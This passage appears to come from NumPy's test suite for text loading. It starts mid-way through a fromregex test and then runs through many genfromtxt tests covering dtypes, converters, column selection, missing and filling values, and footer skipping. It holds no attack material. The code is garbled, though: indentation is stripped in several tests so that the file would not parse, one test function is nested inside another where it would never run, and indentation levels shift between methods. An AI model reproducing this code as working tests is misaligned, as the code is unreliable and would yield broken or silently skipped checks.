x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
    # Test w/ explicit dtype
    data = TextIO('1 2\n3 4')
    test = np.genfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
    control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
    assert_equal(test, control)
    #
    # Same check with a dict-style dtype descriptor.
    data = TextIO('M 64.0 75.0\nF 25.0 60.0')
    descriptor = {'names': ('gender', 'age', 'weight'),
                  'formats': ('S1', 'i4', 'f4')}
    control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
                       dtype=descriptor)
    test = np.genfromtxt(data, dtype=descriptor)
    assert_equal(test, control)
def test_array(self):
    # Test outputting a standard ndarray
    data = TextIO('1 2\n3 4')
    control = np.array([[1, 2], [3, 4]], dtype=int)
    test = np.genfromtxt(data, dtype=int)
    assert_array_equal(test, control)
    #
    # NOTE(review): the second pass uses np.loadtxt, not genfromtxt —
    # looks like a copy-paste from TestLoadTxt; confirm intent.
    data.seek(0)
    control = np.array([[1, 2], [3, 4]], dtype=float)
    test = np.loadtxt(data, dtype=float)
    assert_array_equal(test, control)
def test_1D(self):
    # Test squeezing to 1D
    control = np.array([1, 2, 3, 4], int)
    #
    data = TextIO('1\n2\n3\n4\n')
    test = np.genfromtxt(data, dtype=int)
    assert_array_equal(test, control)
    #
    # Same values, comma-delimited on a single line.
    data = TextIO('1,2,3,4\n')
    test = np.genfromtxt(data, dtype=int, delimiter=',')
    assert_array_equal(test, control)
def test_comments(self):
    # Test the stripping of comments
    control = np.array([1, 2, 3, 5], int)
    # Comment on its own line
    data = TextIO('# comment\n1,2,3,5\n')
    test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
    assert_equal(test, control)
    # Comment at the end of a line
    data = TextIO('1,2,3,5# comment\n')
    test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
    assert_equal(test, control)
def test_skiprows(self):
    # Test row skipping
    control = np.array([1, 2, 3, 5], int)
    kwargs = dict(dtype=int, delimiter=',')
    #
    data = TextIO('comment\n1,2,3,5\n')
    test = np.genfromtxt(data, skip_header=1, **kwargs)
    assert_equal(test, control)
    #
    # NOTE(review): this branch calls np.loadtxt (keyword ``skiprows``),
    # not genfromtxt — presumably intentional cross-check; confirm.
    data = TextIO('# comment\n1,2,3,5\n')
    test = np.loadtxt(data, skiprows=1, **kwargs)
    assert_equal(test, control)
def test_skip_footer(self):
    # Build 5 header comment lines, a name row, 51 data rows (the last
    # malformed), then drop header and the trailing 10 rows.
    data = ["# %i" % i for i in range(1, 6)]
    data.append("A, B, C")
    data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
    data[-1] = "99,99"
    kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
    test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
    ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
                    dtype=[(_, float) for _ in "ABC"])
    assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
    # skip_footer interacting with rows that have the wrong column count.
    with suppress_warnings() as sup:
        sup.filter(ConversionWarning)
        basestr = '1 1\n2 2\n3 3\n4 4\n5  \n6  \n7  \n'
        # Footer too small to get rid of all invalid values
        assert_raises(ValueError, np.genfromtxt,
                      TextIO(basestr), skip_footer=1)
        # With invalid_raise disabled the bad rows are silently dropped.
        a = np.genfromtxt(
            TextIO(basestr), skip_footer=1, invalid_raise=False)
        assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
        #
        a = np.genfromtxt(TextIO(basestr), skip_footer=3)
        assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
        #
        # Invalid rows interleaved with valid ones.
        basestr = '1 1\n2  \n3 3\n4 4\n5  \n6 6\n7 7\n'
        a = np.genfromtxt(
            TextIO(basestr), skip_footer=1, invalid_raise=False)
        assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
        a = np.genfromtxt(
            TextIO(basestr), skip_footer=3, invalid_raise=False)
        assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
    # Test retrieving a header
    data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
    with warnings.catch_warnings(record=True) as w:
        # dtype=None emits a VisibleDeprecationWarning (encoding unset).
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, dtype=None, names=True)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    control = {'gender': np.array([b'M', b'F']),
               'age': np.array([64.0, 25.0]),
               'weight': np.array([75.0, 60.0])}
    assert_equal(test['gender'], control['gender'])
    assert_equal(test['age'], control['age'])
    assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
    # Test the automatic definition of the output dtype
    data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    # One column each of bytes, int, float, complex and bool.
    control = [np.array([b'A', b'BCD']),
               np.array([64, 25]),
               np.array([75.0, 60.0]),
               np.array([3 + 4j, 5 + 6j]),
               np.array([True, False]), ]
    assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
    for (i, ctrl) in enumerate(control):
        assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
    # Tests whether the output dtype can be uniformized
    # (all-integer input collapses to a plain 2-D int array).
    data = TextIO('1 2 3 4\n5 6 7 8\n')
    test = np.genfromtxt(data, dtype=None)
    control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
    assert_equal(test, control)
def test_fancy_dtype(self):
    # Check that a nested dtype isn't MIA
    data = TextIO('1,2,3.0\n4,5,6.0\n')
    fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
    test = np.genfromtxt(data, dtype=fancydtype, delimiter=',')
    control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
    assert_equal(test, control)
def test_names_overwrite(self):
    # Test overwriting the names of the dtype
    descriptor = {'names': ('g', 'a', 'w'),
                  'formats': ('S1', 'i4', 'f4')}
    data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
    names = ('gender', 'age', 'weight')
    test = np.genfromtxt(data, dtype=descriptor, names=names)
    # ``names`` takes precedence over the names in the descriptor.
    descriptor['names'] = names
    control = np.array([('M', 64.0, 75.0),
                        ('F', 25.0, 60.0)], dtype=descriptor)
    assert_equal(test, control)
def test_commented_header(self):
    # Check that names can be retrieved even if the line is commented out.
    data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
    """)
    # The # is part of the first name and should be deleted automatically.
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, names=True, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
                    dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
    assert_equal(test, ctrl)
    # Ditto, but we should get rid of the first element
    # (the comment marker is followed by a space here).
    data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
    """)
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, names=True, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    assert_equal(test, ctrl)
def test_names_and_comments_none(self):
    # Tests case when names is true but comments is None (gh-10780)
    data = TextIO('col1 col2\n 1 2\n 3 4')
    test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
    control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
    assert_equal(test, control)
def test_file_is_closed_on_error(self):
    # gh-13200: the input file must be closed even when decoding fails.
    with tempdir() as tmpdir:
        fpath = os.path.join(tmpdir, "test.csv")
        with open(fpath, "wb") as f:
            f.write(u'\N{GREEK PI SYMBOL}'.encode('utf8'))

        # ResourceWarnings are emitted from a destructor, so won't be
        # detected by regular propagation to errors.
        with assert_no_warnings():
            with pytest.raises(UnicodeDecodeError):
                np.genfromtxt(fpath, encoding="ascii")
def test_autonames_and_usecols(self):
    # Tests names and usecols: columns may be selected by name.
    data = TextIO('A B C D\n aaaa 121 45 9.1')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, usecols=('A', 'C', 'D'),
                             names=True, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    control = np.array(('aaaa', 45, 9.1),
                       dtype=[('A', '|S4'), ('C', int), ('D', float)])
    assert_equal(test, control)
def test_converters_with_usecols(self):
    # Test the combination user-defined converters and usecol
    data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
    # Converter indices refer to the original columns, not the selection.
    test = np.genfromtxt(data, dtype=int, delimiter=',',
                         converters={3: lambda s: int(s or - 999)},
                         usecols=(1, 3,))
    control = np.array([[2, -999], [7, 9]], int)
    assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
    # Tests names and usecols: converters can be keyed by column name.
    data = TextIO('A B C D\n aaaa 121 45 9.1')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, usecols=('A', 'C', 'D'), names=True,
                             dtype=None,
                             converters={'C': lambda s: 2 * int(s)})
        assert_(w[0].category is np.VisibleDeprecationWarning)
    control = np.array(('aaaa', 90, 9.1),
                       dtype=[('A', '|S4'), ('C', int), ('D', float)])
    assert_equal(test, control)
def test_converters_cornercases(self):
    # Test the conversion to datetime.
    converter = {
        'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
    data = TextIO('2009-02-03 12:00:00Z, 72214.0')
    test = np.genfromtxt(data, delimiter=',', dtype=None,
                         names=['date', 'stid'], converters=converter)
    # The converted column gets an object dtype.
    control = np.array((datetime(2009, 2, 3), 72214.),
                       dtype=[('date', np.object_), ('stid', float)])
    assert_equal(test, control)
def test_converters_cornercases2(self):
    # Test the conversion to datetime64.
    converter = {
        'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
    data = TextIO('2009-02-03 12:00:00Z, 72214.0')
    test = np.genfromtxt(data, delimiter=',', dtype=None,
                         names=['date', 'stid'], converters=converter)
    control = np.array((datetime(2009, 2, 3), 72214.),
                       dtype=[('date', 'datetime64[us]'), ('stid', float)])
    assert_equal(test, control)
def test_unused_converter(self):
    # Test whether unused converters are forgotten
    data = TextIO("1 21\n  3 42\n")
    test = np.genfromtxt(data, usecols=(1,),
                         converters={0: lambda s: int(s, 16)})
    assert_equal(test, [21, 42])
    #
    # Converter on the selected column is applied (hex parse).
    data.seek(0)
    test = np.genfromtxt(data, usecols=(1,),
                         converters={1: lambda s: int(s, 16)})
    assert_equal(test, [33, 66])
def test_invalid_converter(self):
    # A converter that raises on some rows must surface as ConverterError.
    strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
                                 (b'r' not in x.lower() and x.strip() or 0.0))
    strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
                                (b'%' not in x.lower() and x.strip() or 0.0))
    s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
               "L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
               "D02N03,10/10/2004,R 1,,7,145.55")
    kwargs = dict(
        converters={2: strip_per, 3: strip_rand}, delimiter=",",
        dtype=None)
    assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
    # Test some corner cases: a converter that strips a leading character.
    s = TextIO('q1,2\nq3,4')
    cnv = lambda s: float(s[1:])
    test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
    control = np.array([[1., 2.], [3., 4.]])
    assert_equal(test, control)
def test_dtype_with_converters(self):
    # A converter returning bytes overrides the float dtype per-column...
    dstr = "2009; 23; 46"
    test = np.genfromtxt(TextIO(dstr,),
                         delimiter=";", dtype=float, converters={0: bytes})
    control = np.array([('2009', 23., 46)],
                       dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
    assert_equal(test, control)
    # ...while a float converter keeps the homogeneous float array.
    test = np.genfromtxt(TextIO(dstr,),
                         delimiter=";", dtype=float, converters={0: float})
    control = np.array([2009., 23., 46],)
    assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
    # recfromcsv with explicit dtype, converters and column selection.
    dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
    dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
    dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
    # Last column is mapped to a small-int code via the dmap lookup.
    conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
    test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
                         names=None, converters=conv)
    control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
    assert_equal(test, control)
    dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
    test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
                         usecols=(0,1,3), names=None, converters=conv)
    control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
    assert_equal(test, control)
def test_dtype_with_object(self):
    # Test using an explicit dtype with an object
    data = """ 1; 2001-01-01
               2; 2002-01-31 """
    ndtype = [('idx', int), ('code', object)]
    func = lambda s: strptime(s.strip(), "%Y-%m-%d")
    converters = {1: func}
    test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
                         converters=converters)
    control = np.array(
        [(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
        dtype=ndtype)
    assert_equal(test, control)

    # Nested object fields are explicitly unsupported.
    ndtype = [('nest', [('idx', int), ('code', object)])]
    with assert_raises_regex(NotImplementedError,
                             'Nested fields.* not supported.*'):
        test = np.genfromtxt(TextIO(data), delimiter=";",
                             dtype=ndtype, converters=converters)
    def test_userconverters_with_explicit_dtype(self):
        # Test user_converters w/ explicit (standard) dtype: the bytes
        # converter on column 2 promotes that field to '|S10' even though
        # the requested dtype is float.
        data = TextIO('skip,skip,2001-01-01,1.0,skip')
        test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
                             usecols=(2, 3), converters={2: bytes})
        control = np.array([('2001-01-01', 1.)],
                           dtype=[('', '|S10'), ('', float)])
        assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.genfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
    def test_missing(self):
        # An empty field can be patched by a converter supplying a
        # substitute value (-999) when the raw string is falsy.
        data = TextIO('1,2,3,,5\n')
        test = np.genfromtxt(data, dtype=int, delimiter=',',
                             converters={3: lambda s: int(s or - 999)})
        control = np.array([1, 2, 3, -999, 5], int)
        assert_equal(test, control)
    def test_missing_with_tabs(self):
        # Test w/ a tab delimiter: empty tab-separated fields become
        # masked entries (NaN data + True mask) under usemask=True.
        txt = "1\t2\t3\n\t2\t\n1\t\t3"
        test = np.genfromtxt(TextIO(txt), delimiter="\t",
                             usemask=True,)
        ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
        ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
        assert_equal(test.data, ctrl_d)
        assert_equal(test.mask, ctrl_m)
    def test_usecols(self):
        # Test the selection of columns; controls round-trip through
        # savetxt so genfromtxt reads exactly what savetxt wrote.
        # Select 1 column
        control = np.array([[1, 2], [3, 4]], float)
        data = TextIO()
        np.savetxt(data, control)
        data.seek(0)
        test = np.genfromtxt(data, dtype=float, usecols=(1,))
        assert_equal(test, control[:, 1])
        # Select two of three columns.
        control = np.array([[1, 2, 3], [3, 4, 5]], float)
        data = TextIO()
        np.savetxt(data, control)
        data.seek(0)
        test = np.genfromtxt(data, dtype=float, usecols=(1, 2))
        assert_equal(test, control[:, 1:])
        # Testing with arrays instead of tuples.
        data.seek(0)
        test = np.genfromtxt(data, dtype=float, usecols=np.array([1, 2]))
        assert_equal(test, control[:, 1:])
    def test_usecols_as_css(self):
        # Test giving usecols with a comma-separated string of field names.
        data = "1 2 3\n4 5 6"
        test = np.genfromtxt(TextIO(data),
                             names="a, b, c", usecols="a, c")
        ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
        assert_equal(test, ctrl)
    def test_usecols_with_structured_dtype(self):
        # Test usecols with an explicit structured dtype: the two-field
        # dtype maps onto the two selected columns (0 and 2).
        data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
        names = ['stid', 'temp']
        dtypes = ['S4', 'f8']
        test = np.genfromtxt(
            data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
        assert_equal(test['stid'], [b"JOE", b"BOB"])
        assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
    def test_usecols_with_named_columns(self):
        # Test usecols with named columns: negative indices and name
        # strings must select the same fields.
        ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
        data = "1 2 3\n4 5 6"
        kwargs = dict(names="a, b, c")
        test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
        assert_equal(test, ctrl)
        test = np.genfromtxt(TextIO(data),
                             usecols=('a', 'c'), **kwargs)
        assert_equal(test, ctrl)
    def test_empty_file(self):
        # An empty input warns ("Empty input file") and yields an empty
        # array, with or without skip_header.
        with suppress_warnings() as sup:
            sup.filter(message="genfromtxt: Empty input file:")
            data = TextIO()
            test = np.genfromtxt(data)
            assert_equal(test, np.array([]))
            # when skip_header > 0
            test = np.genfromtxt(data, skip_header=1)
            assert_equal(test, np.array([]))
    def test_fancy_dtype_alt(self):
        # Check that a nested dtype isn't MIA when reading into a masked
        # array (usemask=True).
        data = TextIO('1,2,3.0\n4,5,6.0\n')
        fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
        test = np.genfromtxt(data, dtype=fancydtype, delimiter=',', usemask=True)
        control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
        assert_equal(test, control)
    def test_shaped_dtype(self):
        # A sub-array field ('block', int, (2, 3)) consumes six flat
        # columns and reshapes them into the declared (2, 3) shape.
        c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 3))])
        x = np.genfromtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
                     dtype=dt)
        assert_array_equal(x, a)
    def test_withmissing(self):
        # 'N/A' entries become masked values both with dtype=None
        # (inferred int) and with the default dtype (float).
        data = TextIO('A,B\n0,1\n2,N/A')
        kwargs = dict(delimiter=",", missing_values="N/A", names=True)
        test = np.genfromtxt(data, dtype=None, usemask=True, **kwargs)
        control = ma.array([(0, 1), (2, -1)],
                           mask=[(False, False), (False, True)],
                           dtype=[('A', int), ('B', int)])
        assert_equal(test, control)
        assert_equal(test.mask, control.mask)
        # Same input, default (float) dtype.
        data.seek(0)
        test = np.genfromtxt(data, usemask=True, **kwargs)
        control = ma.array([(0, 1), (2, -1)],
                           mask=[(False, False), (False, True)],
                           dtype=[('A', float), ('B', float)])
        assert_equal(test, control)
        assert_equal(test.mask, control.mask)
    def test_user_missing_values(self):
        # missing_values can be a single string, or a dict keyed by column
        # index and/or field name; each form marks its own mask pattern.
        data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
        basekwargs = dict(dtype=None, delimiter=",", names=True,)
        mdtype = [('A', int), ('B', float), ('C', complex)]
        # Plain string form: only 'N/A' entries are masked.
        test = np.genfromtxt(TextIO(data), missing_values="N/A",
                             **basekwargs)
        control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
                            (-9, 2.2, -999j), (3, -99, 3j)],
                           mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
                           dtype=mdtype)
        assert_equal(test, control)
        # Dict keyed by column index.
        basekwargs['dtype'] = mdtype
        test = np.genfromtxt(TextIO(data),
                             missing_values={0: -9, 1: -99, 2: -999j}, usemask=True, **basekwargs)
        control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
                            (-9, 2.2, -999j), (3, -99, 3j)],
                           mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
                           dtype=mdtype)
        assert_equal(test, control)
        # Dict mixing column index and field names.
        test = np.genfromtxt(TextIO(data),
                             missing_values={0: -9, 'B': -99, 'C': -999j},
                             usemask=True,
                             **basekwargs)
        control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
                            (-9, 2.2, -999j), (3, -99, 3j)],
                           mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
                           dtype=mdtype)
        assert_equal(test, control)
    def test_user_filling_values(self):
        # Test with missing and filling values: per-column dicts (by index
        # or name) and a single scalar filling value.
        ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
        data = "N/A, 2, 3\n4, ,???"
        kwargs = dict(delimiter=",",
                      dtype=int,
                      names="a,b,c",
                      missing_values={0: "N/A", 'b': " ", 2: "???"},
                      filling_values={0: 0, 'b': 0, 2: -999})
        test = np.genfromtxt(TextIO(data), **kwargs)
        ctrl = np.array([(0, 2, 3), (4, 0, -999)],
                        dtype=[(_, int) for _ in "abc"])
        assert_equal(test, ctrl)
        # Same dicts still apply when usecols drops the middle column.
        test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
        ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
        assert_equal(test, ctrl)
        data2 = "1,2,*,4\n5,*,7,8\n"
        test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
                             missing_values="*", filling_values=0)
        ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
        assert_equal(test, ctrl)
        test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
                             missing_values="*", filling_values=-1)
        ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
        assert_equal(test, ctrl)
    def test_withmissing_float(self):
        # A float missing value ('-999.0') must match the textual field
        # '-999.00' and produce a masked entry.
        data = TextIO('A,B\n0,1.5\n2,-999.00')
        test = np.genfromtxt(data, dtype=None, delimiter=',',
                             missing_values='-999.0', names=True, usemask=True)
        control = ma.array([(0, 1.5), (2, -1.)],
                           mask=[(False, False), (False, True)],
                           dtype=[('A', int), ('B', float)])
        assert_equal(test, control)
        assert_equal(test.mask, control.mask)
    def test_with_masked_column_uniform(self):
        # Test masked column: uniform dtype, the '2,5' missing values mask
        # the whole middle column.
        data = TextIO('1 2 3\n4 5 6\n')
        test = np.genfromtxt(data, dtype=None,
                             missing_values='2,5', usemask=True)
        control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
        assert_equal(test, control)
    def test_with_masked_column_various(self):
        # Test masked column with heterogeneous columns: dtype=None infers
        # a structured (bool, bool, int) result, middle column masked.
        data = TextIO('True 2 3\nFalse 5 6\n')
        test = np.genfromtxt(data, dtype=None,
                             missing_values='2,5', usemask=True)
        control = ma.array([(1, 2, 3), (0, 5, 6)],
                           mask=[(0, 1, 0), (0, 1, 0)],
                           dtype=[('f0', bool), ('f1', bool), ('f2', int)])
        assert_equal(test, control)
    def test_invalid_raise(self):
        # invalid_raise=False must warn (ConversionWarning), skip the five
        # malformed rows, and keep the 45 valid ones; the default
        # (invalid_raise=True) must raise ValueError instead.
        data = ["1, 1, 1, 1, 1"] * 50
        for i in range(5):
            data[10 * i] = "2, 2, 2, 2 2"   # malformed: 4 fields, not 5
        data.insert(0, "a, b, c, d, e")
        mdata = TextIO("\n".join(data))

        kwargs = dict(delimiter=",", dtype=None, names=True)
        # XXX: is there a better way to get the return value of the
        # callable in assert_warns ?
        ret = {}
        def f(_ret={}):
            # ``_ret`` is always passed explicitly below, so the mutable
            # default is never shared in practice.
            _ret['mtest'] = np.genfromtxt(mdata, invalid_raise=False, **kwargs)
        assert_warns(ConversionWarning, f, _ret=ret)
        mtest = ret['mtest']
        assert_equal(len(mtest), 45)
        assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
        # Default behavior: raise on the malformed rows.
        mdata.seek(0)
        assert_raises(ValueError, np.genfromtxt, mdata,
                      delimiter=",", names=True)
    def test_invalid_raise_with_usecols(self):
        # Test invalid_raise with usecols: selecting columns (0, 4) still
        # sees the malformed rows, while (0, 1) avoids them entirely.
        data = ["1, 1, 1, 1, 1"] * 50
        for i in range(5):
            data[10 * i] = "2, 2, 2, 2 2"   # malformed: 4 fields, not 5
        data.insert(0, "a, b, c, d, e")
        mdata = TextIO("\n".join(data))
        kwargs = dict(delimiter=",", dtype=None, names=True,
                      invalid_raise=False)
        # XXX: is there a better way to get the return value of the
        # callable in assert_warns ?
        ret = {}
        def f(_ret={}):
            # ``_ret`` is always passed explicitly below.
            _ret['mtest'] = np.genfromtxt(mdata, usecols=(0, 4), **kwargs)
        assert_warns(ConversionWarning, f, _ret=ret)
        mtest = ret['mtest']
        assert_equal(len(mtest), 45)
        assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
        # usecols=(0, 1) never touches the broken 5th field: all 50 rows load.
        mdata.seek(0)
        mtest = np.genfromtxt(mdata, usecols=(0, 1), **kwargs)
        assert_equal(len(mtest), 50)
        control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
        control[[10 * _ for _ in range(5)]] = (2, 2)
        assert_equal(mtest, control)
    def test_inconsistent_dtype(self):
        # A converter whose output ('(…)' strings) cannot be stored in the
        # declared int field must raise ValueError.
        data = ["1, 1, 1, 1, -1.1"] * 50
        mdata = TextIO("\n".join(data))
        converters = {4: lambda x: "(%s)" % x}
        kwargs = dict(delimiter=",", converters=converters,
                      dtype=[(_, int) for _ in 'abcde'],)
        assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
    def test_default_field_format(self):
        # ``defaultfmt`` controls the auto-generated field names
        # (f00, f01, ... instead of f0, f1, ...).
        data = "0, 1, 2.3\n4, 5, 6.7"
        mtest = np.genfromtxt(TextIO(data),
                              delimiter=",", dtype=None, defaultfmt="f%02i")
        ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
                        dtype=[("f00", int), ("f01", int), ("f02", float)])
        assert_equal(mtest, ctrl)
    def test_single_dtype_wo_names(self):
        # Test single dtype w/o names: a plain 2-D float array is returned
        # and ``defaultfmt`` is irrelevant (no field names are created).
        data = "0, 1, 2.3\n4, 5, 6.7"
        mtest = np.genfromtxt(TextIO(data),
                              delimiter=",", dtype=float, defaultfmt="f%02i")
        ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
        assert_equal(mtest, ctrl)
    def test_single_dtype_w_explicit_names(self):
        # Test single dtype w explicit names: the scalar dtype is repeated
        # for each named field.
        data = "0, 1, 2.3\n4, 5, 6.7"
        mtest = np.genfromtxt(TextIO(data),
                              delimiter=",", dtype=float, names="a, b, c")
        ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
                        dtype=[(_, float) for _ in "abc"])
        assert_equal(mtest, ctrl)
    def test_single_dtype_w_implicit_names(self):
        # Test single dtype w implicit names (names=True reads them from
        # the header line).
        data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
        mtest = np.genfromtxt(TextIO(data),
                              delimiter=",", dtype=float, names=True)
        ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
                        dtype=[(_, float) for _ in "abc"])
        assert_equal(mtest, ctrl)
    def test_easy_structured_dtype(self):
        # A tuple of scalar dtypes produces a structured result with
        # ``defaultfmt``-generated names.
        data = "0, 1, 2.3\n4, 5, 6.7"
        mtest = np.genfromtxt(TextIO(data), delimiter=",",
                              dtype=(int, float, float), defaultfmt="f_%02i")
        ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
                        dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
        assert_equal(mtest, ctrl)
